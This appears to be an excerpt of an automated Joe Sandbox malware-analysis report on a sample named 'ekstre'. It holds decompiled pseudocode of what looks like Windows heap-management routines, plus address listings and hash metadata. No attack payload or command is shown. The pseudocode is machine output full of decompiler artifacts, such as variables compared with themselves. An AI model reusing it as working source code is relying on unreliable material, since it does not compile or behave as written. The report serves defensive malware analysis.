														__eflags = _t480;
														if(_t480 == 0) {
															goto L64;
														}
														__eflags = _t480 & 0x00000002;
														if((_t480 & 0x00000002) != 0) {
															goto L64;
														}
														asm("lock cmpxchg [esi], ecx");
														__eflags = _t480 - _t480;
														if(_t480 != _t480) {
															continue;
														}
														_t406 =  *_t521;
														_t547 = _t378;
														_v40 = _t406;
														do {
															_t289 = _t406 + ((( *(_t406 + 0x5e) & 0x0000ffff) + _t547 & 0x0000000f) + 2) * 4;
															_t481 =  *_t289;
															_v44 = _t289;
															__eflags = _t481;
															if(_t481 != 0) {
																_t290 =  *(_t481 + 0x1c);
																__eflags = _t290 & 0x00000001;
																if((_t290 & 0x00000001) != 0) {
																	goto L140;
																}
																asm("lock cmpxchg [edi], ecx");
																_t521 = _v16;
																__eflags = _t481 - _t481;
																if(_t481 == _t481) {
																	_t523 = 0xfffffffd;
																	_t295 =  *(_t481 + 0x1c);
																	do {
																		__eflags = _t295 & _t523;
																		asm("lock cmpxchg [esi], ecx");
																	} while ((_t295 & _t523) != 0);
																	__eflags = _t295 - 2;
																	if(_t295 != 2) {
																		goto L64;
																	}
																	_t409 =  *( *_t481);
																	 *_t481 = _t378;
																	_t483 = _t481 + 0x20;
																	L81:
																	E341820E0(_t409, _t483);
																	goto L64;
																}
																L139:
																_t406 = _v40;
																goto L140;
															}
															asm("lock cmpxchg [edx], ecx");
															__eflags = 0;
															if(0 == 0) {
																goto L64;
															}
															goto L139;
															L140:
															_t547 = _t547 + 1;
															__eflags = _t547 - 0x10;
														} while (_t547 < 0x10);
														_t235 =  *_t521 + 0x5c; // 0x56ff8bc3
														_t239 = _t521 + 0x20; // 0x8
														_t483 = _t239;
														_t409 =  *((intOrPtr*)( *((intOrPtr*)( *( *_t521) + 0xc)) + 0x3c0 + ( *_t235 & 0x0000ffff) * 4)) + 0x48;
														goto L81;
													}
													goto L64;
												}
												_v36 =  *((intOrPtr*)( *_t545 + 0x10));
												_v44 = _t545[0x2c];
												_t417 = _t545[0x2a];
												__eflags = _t417 - _t478;
												if(_t417 != _t478) {
													L92:
													_t298 =  *_t521;
													_v44 = _t298;
													_t299 = _t298 + 4;
													_t550 =  *_t299;
													 *_t299 = 0;
													__eflags = _t550;
													if(_t550 == 0) {
														L118:
														__eflags =  *(_t521 + 0x16) & 0x00000003;
														_t551 =  *( *_v44 + 0xc);
														_v44 =  *( *_v44 + 0xc);
														_v48 =  *_t521;
														if(( *(_t521 + 0x16) & 0x00000003) != 0) {
															_v56 =  *((intOrPtr*)(_t521 + 4)) + 0x0000101f & 0xfffff000;
															_t315 = E34230E2D(_t521);
															_push( &_v60);
															_t425 = ( *(_t521 + 0x18) & 0x0000ffff) * (_t315 & 0x0000ffff) << 3;
															__eflags = _t425;
															_v52 = _t425;
															_t318 = E3416F0E1( *((intOrPtr*)(_t551 + 0xc)), _t478);
															_t417 = _t425;
															_push(_t318);
															_push( &_v52);
															_push( &_v56);
															_push(0xffffffff);
															E341B2EB0();
														}
														 *( *((intOrPtr*)(_t521 + 4)) + 0xc) = _t378;
														E3418252B(_t551,  *((intOrPtr*)(_t521 + 4)), _t417);
														_t305 =  *(_t521 + 0x18) & 0x0000ffff;
														_v36 = _t305;
														_t307 = _v48 + 0x50;
														__eflags = _t307;
														_v36 =  ~_t305;
														_v32 = _t307;
														goto L121;
														do {
															do {
																L121:
																_t552 =  *_t307;
																_t486 =  *((intOrPtr*)(_t307 + 4));
																_v48 = _t486;
																asm("lock cmpxchg8b [edi]");
																__eflags = _t552 - _t552;
																_t307 = _v32;
															} while (_t552 != _t552);
															__eflags = _t486 - _v48;
														} while (_t486 != _v48);
														_t527 = _v16;
														_t378 = 0;
														__eflags = 0;
														 *((intOrPtr*)(_t527 + 4)) = 0;
														asm("lock inc dword [eax+0x20]");
														 *((intOrPtr*)(_t527 + 0x10)) = 0;
														_t213 = _t527 + 0x1c; // 0x4
														_t553 = 0xfffffffe;
														_t310 =  *_t213;
														do {
															__eflags = _t310 & _t553;
															asm("lock cmpxchg [edx], ecx");
														} while ((_t310 & _t553) != 0);
														__eflags = _t310 - 1;
														if(_t310 != 1) {
															goto L64;
														}
														_t214 = _t527 + 0x20; // 0x8
														_t483 = _t214;
														_t409 =  *((intOrPtr*)( *_t527));
														 *_t527 = 0;
														goto L81;
													}
													_t528 = 0xfffffff9;
													_t322 =  *(_t550 + 0x1c);
													do {
														__eflags = _t322 & _t528;
														asm("lock cmpxchg [edx], ecx");
													} while ((_t322 & _t528) != 0);
													_t521 = _v16;
													__eflags = _t322 - 6;
													if(_t322 != 6) {
														_t417 = _v44;
														_t323 = L34183AF6(_v44, _t550);
														__eflags = _t323;
														if(_t323 == 0) {
															L117:
															_t478 = 1;
															__eflags = 1;
															goto L118;
														} else {
															goto L98;
														}
														while(1) {
															L98:
															_t491 =  *(_t550 + 0x1c);
															__eflags = _t491;
															if(_t491 == 0) {
																goto L117;
															}
															__eflags = _t491 & 0x00000002;
															if((_t491 & 0x00000002) != 0) {
																goto L117;
															}
															_t417 = _t491 | 0x00000002;
															asm("lock cmpxchg [edi], ecx");
															_t521 = _v16;
															__eflags = _t491 - _t491;
															if(_t491 != _t491) {
																continue;
															}
															_t492 =  *_t550;
															_t430 = _t378;
															_v40 = _t492;
															_v36 = _t378;
															while(1) {
																_t154 = _t492 + 0x5e; // 0xf28b56ff
																_t494 = _t492 + (( *_t154 & 0x0000ffff) + _t430 & 0x0000000f) * 4 + 8;
																_v48 = _t494;
																_t328 =  *_t494;
																_v32 = _t328;
																__eflags = _t328;
																if(_t328 != 0) {
																	goto L105;
																}
																_t417 = _t550;
																asm("lock cmpxchg [edx], ecx");
																__eflags = _t328;
																if(_t328 == 0) {
																	goto L117;
																}
																L107:
																_t430 = _v36;
																L108:
																_t430 = _t430 + 1;
																_v36 = _t430;
																__eflags = _t430 - 0x10;
																if(_t430 >= 0x10) {
																	_t431 =  *_t550;
																	_t417 =  *((intOrPtr*)( *((intOrPtr*)( *_t431 + 0xc)) + 0x3c0 + ( *(_t431 + 0x5c) & 0x0000ffff) * 4)) + 0x48;
																	__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t431 + 0xc)) + 0x3c0 + ( *(_t431 + 0x5c) & 0x0000ffff) * 4)) + 0x48;
																	L115:
																	_t177 = _t550 + 0x20; // 0x20
																	_t497 = _t177;
																	L116:
																	E341820E0(_t417, _t497);
																	goto L117;
																}
																_t492 = _v40;
																continue;
																L105:
																_t329 = _t328 + 0x1c;
																_v28 = _t329;
																_t478 = 1;
																_t330 =  *_t329;
																__eflags = 1 & _t330;
																if((1 & _t330) != 0) {
																	goto L108;
																}
																asm("lock cmpxchg [edi], ecx");
																_t521 = _v16;
																__eflags = _v32 - _v32;
																if(_v32 == _v32) {
																	_t531 = 0xfffffffd;
																	_t335 =  *_v28;
																	do {
																		_t417 = _t335 & _t531;
																		__eflags = _t417;
																		asm("lock cmpxchg [esi], ecx");
																	} while (_t417 != 0);
																	_t521 = _v16;
																	__eflags = _t335 - 2;
																	if(_t335 != 2) {
																		goto L118;
																	}
																	_t498 = _v32;
																	_t417 =  *( *_t498);
																	 *_t498 = _t378;
																	_t497 = _t498 + 0x20;
																	goto L116;
																}
																goto L107;
															}
														}
														goto L117;
													}
													_t417 =  *( *_t550);
													 *_t550 = _t378;
													goto L115;
												}
												_t417 = _v36;
												__eflags = _t417 - _v44;
												if(_t417 < _v44) {
													goto L92;
												}
												_v36 = _t417 - _v44;
												_t417 =  *_t545;
												__eflags = _v36 -  *((intOrPtr*)(_t417 + 0x14));
												_t521 = _v16;
												if(_v36 <  *((intOrPtr*)(_t417 + 0x14))) {
													goto L127;
												}
												goto L92;
											}
											_t118 = _t521 + 8; // -16
											_t499 = L341FE9F6(_t118);
											__eflags = _t499;
											if(_t499 == 0) {
												L87:
												_t478 = 1;
												__eflags = 1;
												goto L88;
											}
											_t555 = _v32;
											do {
												_t437 =  *(_t499 - 4);
												_t499 =  *_t499;
												asm("btr [eax], edi");
												_t555 = _t555 + 1;
												_v36 = _t437 >> 0x00000008 & 0x0000ffff;
												__eflags = _t499;
											} while (_t499 != 0);
											_t521 = _v16;
											_t378 = 0;
											__eflags = 0;
											_v32 = _t555;
											_t542 = _v28;
											goto L87;
										}
										_t111 = _t518 + 8; // 0x8
										_t483 = _t111;
										_t409 = _v16 + 8;
										goto L81;
									}
									_t397 = _v44;
									L77:
									_t397 = _t397 + 1;
									_v44 = _t397;
									__eflags = _t397 - _v48;
									if(_t397 <= _v48) {
										_t274 = _v40;
										continue;
									}
									_t542 = _t541 | 0xffffffff;
									__eflags = _t542;
									_v28 = _t542;
									goto L79;
								}
							}
							_push(_t378);
							_push(_t378);
							_push(_t378);
							_push(_t518);
							_t442 = 3;
							E34235FED(_t442,  *((intOrPtr*)(_t396 + 0xc)));
							goto L64;
						}
						__eflags =  *(_t518 + 7) - _t378;
						if(__eflags >= 0) {
							__eflags =  *(_t535 + 0x4c) - _t378;
							if( *(_t535 + 0x4c) == _t378) {
								L34:
								_t344 = 1;
								L35:
								_v5 = _t344;
								_v6 = _t344;
								__eflags = _t344;
								if(_t344 == 0) {
									L29:
									_t504 = _v20;
									L30:
									_push(_t378);
									_push(_t378);
									_push(_t504);
									_push(_t518);
									_t443 = 3;
									E34235FED(_t443, _t535);
									__eflags = _v5 - _t378;
									if(_v5 == _t378) {
										goto L22;
									}
									L31:
									__eflags = _a4 & 0x3c000102;
									_t48 = _v20 - 8; // 0x34266d44
									_t444 = _t48;
									_v44 =  *_t444;
									if((_a4 & 0x3c000102) != 0) {
										goto L59;
									}
									__eflags = _t444[3] - 5;
									if(_t444[3] != 5) {
										_t445 = _t378;
									} else {
										_t51 =  &(_t444[3]); // 0xed4e
										_t249 = _v20;
										_t445 = _t444 - (( *_t51 & 0x000000ff) << 3) + 8;
									}
									_t348 = L342178DE(_v44, _t535, _t249, 3, _t445);
									__eflags = _t348;
									if(_t348 < 0) {
										goto L22;
									} else {
										_t249 = _v20;
										goto L59;
									}
								}
								__eflags =  *(_t518 + 7) - _t378;
								if( *(_t518 + 7) >= _t378) {
									__eflags =  *(_t535 + 0x4c) - _t378;
									if( *(_t535 + 0x4c) == _t378) {
										_t351 =  *_t518 & 0x0000ffff;
									} else {
										_t359 =  *_t518;
										__eflags =  *(_t535 + 0x4c) & _t359;
										if(( *(_t535 + 0x4c) & _t359) != 0) {
											_t359 = _t359 ^  *(_t535 + 0x50);
											__eflags = _t359;
										}
										_t351 = _t359 & 0x0000ffff;
									}
								} else {
									_t456 = _t518 >> 0x00000003 ^  *_t518 ^  *0x34266964 ^ _t535;
									__eflags = _t456;
									if(_t456 == 0) {
										_t361 = _t518 - (_t456 >> 0xd);
										__eflags = _t361;
										_t362 =  *_t361;
									} else {
										_t362 = _t378;
									}
									_t351 =  *((intOrPtr*)(_t362 + 0x14));
								}
								__eflags =  *(_t518 + 7) - 4;
								_t509 = _t351 & 0xffff;
								if( *(_t518 + 7) != 4) {
									_t449 = _t509 << 3;
									__eflags = _t449;
								} else {
									__eflags =  *(_t535 + 0x4c) - _t378;
									if( *(_t535 + 0x4c) == _t378) {
										_t356 =  *_t518 & 0x0000ffff;
									} else {
										_t358 =  *_t518;
										__eflags =  *(_t535 + 0x4c) & _t358;
										if(( *(_t535 + 0x4c) & _t358) != 0) {
											_t358 = _t358 ^  *(_t535 + 0x50);
											__eflags = _t358;
										}
										_t356 = _t358 & 0x0000ffff;
									}
									_t449 =  *((intOrPtr*)(_t518 - 8)) - (_t356 & 0x0000ffff) + _t509;
								}
								_t504 = _v20;
								_t353 = _t449 + _t518;
								__eflags = _t353 - _t504;
								asm("sbb al, al");
								_t355 =  !_t353 & _v6;
								__eflags = _t355;
								_v5 = _t355;
								if(_t355 != 0) {
									goto L31;
								} else {
									goto L30;
								}
							}
							_t363 =  *_t518;
							_t511 =  *(_t535 + 0x50) ^ _t363;
							_v68 = _t363;
							_v68 = _t511;
							__eflags = _t511 >> 0x18 - (_t511 >> 0x00000010 ^ _t511 >> 0x00000008 ^ _t511);
							if(_t511 >> 0x18 == (_t511 >> 0x00000010 ^ _t511 >> 0x00000008 ^ _t511)) {
								goto L34;
							}
							_v5 = _t378;
							goto L29;
						}
						_t344 = E34231F59(_t378, _t535, _t518, _t518, _t535, __eflags);
						goto L35;
					} else {
						L22:
						 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000000d;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = L3419ABA0(0xc000000d);
						_t519 = _t378;
						goto L7;
					}
				} else {
					if(( *0x342638c0 & 0x00000002) != 0 && __edx != 0) {
						_t378 =  *(__edx - 8);
						_v20 = __edx - _t378;
					}
					_t370 = L3421D8D2(_a4);
					_t534 = _v20;
					_t372 = E342386A8(_t535, _v20, _t370 & 0x11000001, _a8, _a12);
					_v36 = _t372;
					if(_t372 != 0) {
						_t373 = _a8;
						__eflags = _t373;
						if(_t373 != 0) {
							 *_t373 =  *_t373 - _t378;
							__eflags =  *_t373;
						}
						_t374 = E34183C20(_t535);
						__eflags = _t374;
						if(_t374 != 0) {
							L3422E8B1(_t535, _t534);
						}
					} else {
						 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000000d;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = L3419ABA0(0xc000000d);
					}
					_t519 = _v36;
					L7:
					return _t519;
				}
			}

0x341c7184
0x341c7186
0x341c7188
0x341c718a
0x341c718e
0x341c7191
0x341c719a
0x341c7229
0x341c7233
0x341c78ef
0x341c78f8
0x341c78fd
0x341c7900
0x341c7902
0x00000000
0x00000000
0x341c7908
0x341c7908
0x341c790b
0x341c790d
0x341c790f
0x341c7911
0x341c7911
0x341c7914
0x341c7917
0x341c7919
0x341c791b
0x341c791b
0x341c791f
0x341c7924
0x341c7926
0x341c792c
0x341c7933
0x341c793e
0x341c793e
0x341c7933
0x00000000
0x341c7926
0x341c7239
0x341c723d
0x341c724a
0x341c724c
0x341c7278
0x341c7279
0x341c727a
0x341c727b
0x341c7280
0x341c7281
0x341c724e
0x341c724e
0x341c7251
0x341c7255
0x341c725e
0x341c725e
0x341c725e
0x341c7260
0x341c7264
0x341c7266
0x341c7267
0x341c7268
0x341c7269
0x341c726e
0x341c726f
0x341c7274
0x341c7274
0x341c7264
0x341c723f
0x341c7246
0x341c7246
0x341c7286
0x341c7288
0x341c72b2
0x341c72b5
0x341c72b9
0x341c7404
0x341c7404
0x341c7407
0x00000000
0x341c78ec
0x341c741a
0x341c741c
0x341c741f
0x341c78d9
0x341c78d9
0x341c78da
0x341c78db
0x341c78dc
0x341c78e1
0x341c78e2
0x341c748b
0x341c748d
0x00000000
0x341c748d
0x341c742c
0x341c742e
0x341c7431
0x341c7433
0x00000000
0x00000000
0x341c743c
0x341c7442
0x341c7447
0x341c744a
0x341c744d
0x341c7452
0x341c745a
0x341c745f
0x341c7475
0x341c7477
0x341c7493
0x341c7498
0x341c749a
0x341c74ac
0x341c749c
0x341c74a5
0x341c74a5
0x341c74b3
0x341c74b4
0x341c74b6
0x341c74b8
0x341c74be
0x341c74c4
0x341c74c9
0x341c74d1
0x341c74d8
0x341c74d8
0x341c74d8
0x341c74c4
0x341c74d9
0x341c74e0
0x341c74e2
0x341c74e5
0x341c74ea
0x341c74f0
0x341c74f3
0x341c74fb
0x341c74fb
0x341c74ff
0x341c7502
0x341c7505
0x341c750a
0x00000000
0x00000000
0x341c7519
0x341c751d
0x341c7520
0x341c7522
0x341c7536
0x341c7536
0x341c753a
0x341c753d
0x341c7555
0x341c755e
0x341c7561
0x341c7565
0x341c75a2
0x341c75b1
0x341c75b3
0x341c75b5
0x341c75b9
0x341c77f9
0x341c77f9
0x341c77fc
0x341c77ff
0x341c7801
0x341c7488
0x341c7488
0x00000000
0x341c7488
0x341c780b
0x341c7810
0x341c7812
0x00000000
0x00000000
0x341c7818
0x341c7818
0x341c781b
0x341c781b
0x341c781d
0x341c781f
0x00000000
0x00000000
0x341c7825
0x341c7828
0x00000000
0x00000000
0x341c7835
0x341c7839
0x341c783b
0x00000000
0x00000000
0x341c783d
0x341c783f
0x341c7841
0x341c7844
0x341c7850
0x341c7853
0x341c7855
0x341c7858
0x341c785a
0x341c7871
0x341c7874
0x341c7876
0x00000000
0x00000000
0x341c787f
0x341c7883
0x341c7886
0x341c7888
0x341c78b2
0x341c78b6
0x341c78b8
0x341c78ba
0x341c78bc
0x341c78bc
0x341c78c2
0x341c78c5
0x00000000
0x00000000
0x341c78cd
0x341c78cf
0x341c78d1
0x341c7548
0x341c7548
0x00000000
0x341c7548
0x341c788a
0x341c788a
0x00000000
0x341c788a
0x341c7863
0x341c7867
0x341c7869
0x00000000
0x00000000
0x00000000
0x341c788d
0x341c788d
0x341c788e
0x341c788e
0x341c789a
0x341c78a5
0x341c78a5
0x341c78a8
0x00000000
0x341c78a8
0x00000000
0x341c781b
0x341c75c4
0x341c75ca
0x341c75cd
0x341c75d0
0x341c75d2
0x341c75f3
0x341c75f3
0x341c75f7
0x341c75fa
0x341c75fd
0x341c75fd
0x341c75ff
0x341c7601
0x341c7714
0x341c7714
0x341c771d
0x341c7722
0x341c7725
0x341c7728
0x341c7739
0x341c773c
0x341c774e
0x341c774f
0x341c774f
0x341c7752
0x341c7759
0x341c775e
0x341c775f
0x341c7763
0x341c7767
0x341c7768
0x341c776a
0x341c776a
0x341c7775
0x341c777b
0x341c7780
0x341c7784
0x341c778e
0x341c778e
0x341c7791
0x341c7794
0x341c7794
0x341c7797
0x341c7797
0x341c7797
0x341c7797
0x341c7799
0x341c779e
0x341c77ab
0x341c77b2
0x341c77b4
0x341c77b4
0x341c77b9
0x341c77b9
0x341c77be
0x341c77c1
0x341c77c1
0x341c77c6
0x341c77c9
0x341c77cf
0x341c77d2
0x341c77d5
0x341c77d6
0x341c77d8
0x341c77da
0x341c77dc
0x341c77dc
0x341c77e2
0x341c77e5
0x00000000
0x00000000
0x341c77ed
0x341c77ed
0x341c77f0
0x341c77f2
0x00000000
0x341c77f2
0x341c760c
0x341c760d
0x341c760f
0x341c7611
0x341c7613
0x341c7613
0x341c7619
0x341c761c
0x341c761f
0x341c762c
0x341c7631
0x341c7636
0x341c7638
0x341c7711
0x341c7713
0x341c7713
0x00000000
0x00000000
0x00000000
0x00000000
0x341c763e
0x341c763e
0x341c763e
0x341c7641
0x341c7643
0x00000000
0x00000000
0x341c7649
0x341c764c
0x00000000
0x00000000
0x341c7657
0x341c765c
0x341c7660
0x341c7663
0x341c7665
0x00000000
0x00000000
0x341c7667
0x341c7669
0x341c766b
0x341c766e
0x341c7671
0x341c7671
0x341c767d
0x341c7680
0x341c7683
0x341c7685
0x341c7688
0x341c768a
0x00000000
0x00000000
0x341c768c
0x341c768e
0x341c7692
0x341c7694
0x00000000
0x00000000
0x341c76bb
0x341c76bb
0x341c76be
0x341c76be
0x341c76bf
0x341c76c2
0x341c76c5
0x341c76f4
0x341c7706
0x341c7706
0x341c7709
0x341c7709
0x341c7709
0x341c770c
0x341c770c
0x00000000
0x341c770c
0x341c76c7
0x00000000
0x341c7698
0x341c7698
0x341c769d
0x341c76a0
0x341c76a1
0x341c76a3
0x341c76a5
0x00000000
0x00000000
0x341c76af
0x341c76b3
0x341c76b6
0x341c76b9
0x341c76d1
0x341c76d2
0x341c76d4
0x341c76d6
0x341c76d6
0x341c76d8
0x341c76d8
0x341c76de
0x341c76e1
0x341c76e4
0x00000000
0x00000000
0x341c76e6
0x341c76eb
0x341c76ed
0x341c76ef
0x00000000
0x341c76ef
0x00000000
0x341c76b9
0x341c7671
0x00000000
0x341c763e
0x341c7623
0x341c7625
0x00000000
0x341c7625
0x341c75d4
0x341c75d7
0x341c75da
0x00000000
0x00000000
0x341c75df
0x341c75e2
0x341c75e7
0x341c75ea
0x341c75ed
0x00000000
0x00000000
0x00000000
0x341c75ed
0x341c7567
0x341c756f
0x341c7571
0x341c7573
0x341c759f
0x341c75a1
0x341c75a1
0x00000000
0x341c75a1
0x341c7578
0x341c757b
0x341c757b
0x341c7581
0x341c7589
0x341c758c
0x341c758d
0x341c7590
0x341c7590
0x341c7594
0x341c7597
0x341c7597
0x341c7599
0x341c759c
0x00000000
0x341c759c
0x341c7542
0x341c7542
0x341c7545
0x00000000
0x341c7545
0x341c7524
0x341c7527
0x341c7527
0x341c7528
0x341c752b
0x341c752e
0x341c74f8
0x00000000
0x341c74f8
0x341c7530
0x341c7530
0x341c7533
0x00000000
0x341c7533
0x341c74fb
0x341c747c
0x341c747d
0x341c747e
0x341c747f
0x341c7482
0x341c7483
0x00000000
0x341c7483
0x341c72bf
0x341c72c2
0x341c72cf
0x341c72d2
0x341c7349
0x341c7349
0x341c734b
0x341c734b
0x341c734e
0x341c7351
0x341c7353
0x341c72f9
0x341c72f9
0x341c72fc
0x341c72fc
0x341c72fd
0x341c72fe
0x341c72ff
0x341c7304
0x341c7305
0x341c730a
0x341c730d
0x00000000
0x00000000
0x341c7313
0x341c7313
0x341c731d
0x341c731d
0x341c7322
0x341c7325
0x00000000
0x00000000
0x341c732b
0x341c732f
0x341c73e9
0x341c7335
0x341c7335
0x341c733e
0x341c7341
0x341c7341
0x341c73f4
0x341c73f9
0x341c73fb
0x00000000
0x341c7401
0x341c7401
0x00000000
0x341c7401
0x341c73fb
0x341c7355
0x341c7358
0x341c7381
0x341c7384
0x341c7395
0x341c7386
0x341c7386
0x341c7388
0x341c738b
0x341c738d
0x341c738d
0x341c738d
0x341c7390
0x341c7390
0x341c735a
0x341c7367
0x341c7369
0x341c736c
0x341c7377
0x341c7377
0x341c7379
0x341c736e
0x341c736e
0x341c736e
0x341c737b
0x341c737b
0x341c7398
0x341c739f
0x341c73a2
0x341c73c9
0x341c73c9
0x341c73a4
0x341c73a4
0x341c73a7
0x341c73b8
0x341c73a9
0x341c73a9
0x341c73ab
0x341c73ae
0x341c73b0
0x341c73b0
0x341c73b0
0x341c73b3
0x341c73b3
0x341c73c3
0x341c73c3
0x341c73cc
0x341c73cf
0x341c73d2
0x341c73d4
0x341c73d8
0x341c73d8
0x341c73db
0x341c73de
0x00000000
0x341c73e4
0x00000000
0x341c73e4
0x341c73de
0x341c72d4
0x341c72d9
0x341c72db
0x341c72e0
0x341c72f2
0x341c72f4
0x00000000
0x00000000
0x341c72f6
0x00000000
0x341c72f6
0x341c72c8
0x00000000
0x341c728a
0x341c728a
0x341c729d
0x341c72a8
0x341c72ab
0x00000000
0x341c72ab
0x341c71a0
0x341c71a7
0x341c71ad
0x341c71b2
0x341c71b2
0x341c71be
0x341c71c3
0x341c71d0
0x341c71d5
0x341c71da
0x341c720a
0x341c720d
0x341c720f
0x341c7211
0x341c7211
0x341c7211
0x341c7215
0x341c721a
0x341c721c
0x341c7222
0x341c7222
0x341c71dc
0x341c71f0
0x341c71fb
0x341c71fb
0x341c71fe
0x341c7201
0x341c7207
0x341c7207

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76da3c03e499d6034e4a67cca361ea47353839c065715ab94be0724d9d0fd402
Instruction ID: 2f63320bfd8a531a8023426cce15b22e1c203e83d1a55a96745eb63df9e0e33b
Opcode Fuzzy Hash: 76da3c03e499d6034e4a67cca361ea47353839c065715ab94be0724d9d0fd402
Instruction Fuzzy Hash: 7B42D4B6A00A16CFEB05CF59C8D05ADB7B6FF98350B14859DE865AB340DB74EC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 34182760 Relevance: .6, Instructions: 605
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E34182760(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				signed char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed char _v100;
				signed char _v101;
				signed int _v108;
				signed char _v112;
				signed char _v116;
				signed int _v120;
				signed char _v124;
				signed char _v128;
				signed int _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t226;
				signed int _t229;
				signed int _t232;
				signed int _t233;
				void* _t234;
				intOrPtr _t237;
				signed int _t242;
				signed int _t245;
				signed char _t246;
				intOrPtr _t250;
				signed short _t254;
				signed int _t256;
				signed char _t260;
				void* _t264;
				signed char _t266;
				intOrPtr* _t268;
				signed char _t271;
				signed int _t272;
				signed short _t275;
				signed short _t278;
				signed short _t279;
				signed int _t284;
				signed short _t285;
				signed int _t287;
				void* _t288;
				signed short _t289;
				signed int _t291;
				void* _t292;
				signed char _t297;
				signed short _t299;
				signed char _t301;
				signed short _t320;
				signed short _t322;
				signed short _t323;
				signed int _t325;
				void* _t326;
				signed char _t330;
				signed int _t334;
				signed int _t335;
				void* _t337;
				signed char _t343;
				signed int _t345;
				intOrPtr _t352;
				signed int _t361;
				signed char _t363;
				signed int _t364;
				signed char _t365;
				unsigned int _t370;
				signed int _t374;
				signed char _t378;
				void* _t385;
				signed int _t387;
				signed char _t388;
				signed int _t390;
				signed int _t391;
				signed short _t396;
				signed int _t398;
				signed char _t399;
				unsigned int _t407;
				unsigned int _t409;
				unsigned int _t411;
				unsigned int _t421;
				unsigned int _t424;
				void* _t429;
				signed char _t430;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				void* _t439;
				void* _t445;

				_t386 = __edx;
				_t337 = _t445;
				_v8 =  *((intOrPtr*)(_t337 + 4));
				_t443 = (_t445 - 0x00000008 & 0xfffffff8) + 4;
				_v16 =  *0x3426b370 ^ (_t445 - 0x00000008 & 0xfffffff8) + 0x00000004;
				_t437 = __ecx;
				_v124 =  *(_t337 + 0xc);
				_t339 =  *(_t337 + 8);
				_t226 =  *(_t337 + 0x10);
				_v112 = _t339;
				_v132 = _t226;
				_v120 = 0;
				_v116 = 0;
				_t428 =  *(_t337 + 0x14);
				_v128 = _t428;
				if(_t339 == 0) {
					 *( *[fs:0x18] + 0xbf4) = 0;
					 *((intOrPtr*)( *[fs:0x18] + 0x34)) = L3419ABA0(0);
					L150:
					_t229 = 0;
					L19:
					_pop(_t429);
					_pop(_t439);
					return L341B4B50(_t229, _t337, _v16 ^ _t443, _t386, _t429, _t439);
				}
				if( *((intOrPtr*)(__ecx + 8)) == 0xddeeddee) {
					_t387 = L3421D8D2(__edx);
					_t232 =  *(__ecx + 0xb0);
					_v108 = _t387;
					__eflags = _t232;
					if(_t232 != 0) {
						_t352 =  *[fs:0x18];
						__eflags = _t232 -  *((intOrPtr*)(_t352 + 0x24));
						if(_t232 ==  *((intOrPtr*)(_t352 + 0x24))) {
							_t390 = _t387 | 0x00000001;
							__eflags = _t390;
							_v108 = _t390;
						}
					}
					__eflags =  *0x342638c0 & 0x00000002;
					_t430 = _v112;
					_t343 = _t430;
					if(( *0x342638c0 & 0x00000002) == 0) {
						_t233 = 0;
						__eflags = 0;
					} else {
						_t233 =  *((intOrPtr*)(_t430 - 8));
						_t343 = _t343 - _t233;
					}
					_t388 = _v108;
					_v120 = _t233;
					_t234 = _t233 + _v124;
					__eflags = _t234 - _v124;
					if(_t234 >= _v124) {
						_t345 = E3423970B(_t437, _t388, _t343, _t234, _v132, _v128);
						_v116 = _t345;
						__eflags = _t345;
						if(_t345 == 0) {
							goto L33;
						}
						__eflags = _t345 - 0xffffffff;
						if(_t345 == 0xffffffff) {
							goto L33;
						} else {
							__eflags =  *0x342638c0 & 0x00000002;
							_t386 = _v120;
							if(( *0x342638c0 & 0x00000002) != 0) {
								 *(_t345 + _t386 - 8) = _t386;
								_t246 = _t345 + _t386;
								__eflags = _t386 - 8;
								if(_t386 > 8) {
									 *_t345 = _t386;
								}
								_v116 = _t246;
							}
							_t245 = _v132;
							__eflags = _t245;
							if(_t245 != 0) {
								 *_t245 =  *_t245 - _t386;
							}
							goto L37;
						}
					} else {
						_t345 = 0;
						__eflags = 0;
						L33:
						asm("sbb ecx, ecx");
						_t55 = ( ~_t345 & 0xffffffee) - 0x3fffffe9; // -1073741801
						_t386 = _t55;
						_v128 = _t386;
						_v116 = 0;
						 *( *[fs:0x18] + 0xbf4) = _t386;
						_t237 = L3419ABA0(_t386);
						__eflags = _v108;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t237;
						if(_v108 < 0) {
							L35:
							_v100 = _v128;
							_v80 = _v124;
							_push( &_v100);
							_v92 = 0;
							_v84 = 1;
							_v96 = 0;
							_v88 = L341C8A60;
							L341C8A60(0, _t386);
							L36:
							_t430 = _v112;
							L37:
							_t242 = E34183C20(_t437);
							__eflags = _t242;
							_t229 = _v116;
							if(_t242 != 0) {
								__eflags = _t229;
								if(_t229 != 0) {
									L3422E8B1(_t437, _t430);
									_t386 = _v116;
									E3422DF93(_t437, _v116);
									_t229 = _v116;
								}
							}
							goto L19;
						}
						__eflags =  *(_t437 + 0xc);
						if( *(_t437 + 0xc) >= 0) {
							goto L36;
						}
						goto L35;
					}
				}
				if(_t226 != 0) {
					 *_t226 = 0;
				}
				if(_t428 != 0) {
					 *_t428 = 0;
				}
				_v108 = _t386;
				if(( *(_t437 + 0x44) & 0x01000000) != 0) {
					_t229 = E3421FDF4(_t337, _t437, _t386, _t428, _t437, __eflags, _t339, _v124);
					goto L19;
				} else {
					if( *0x3426373c != 0) {
						L8:
						if(( *(_t437 + 0x48) & 0x00000001) != 0) {
							_t386 = _t339;
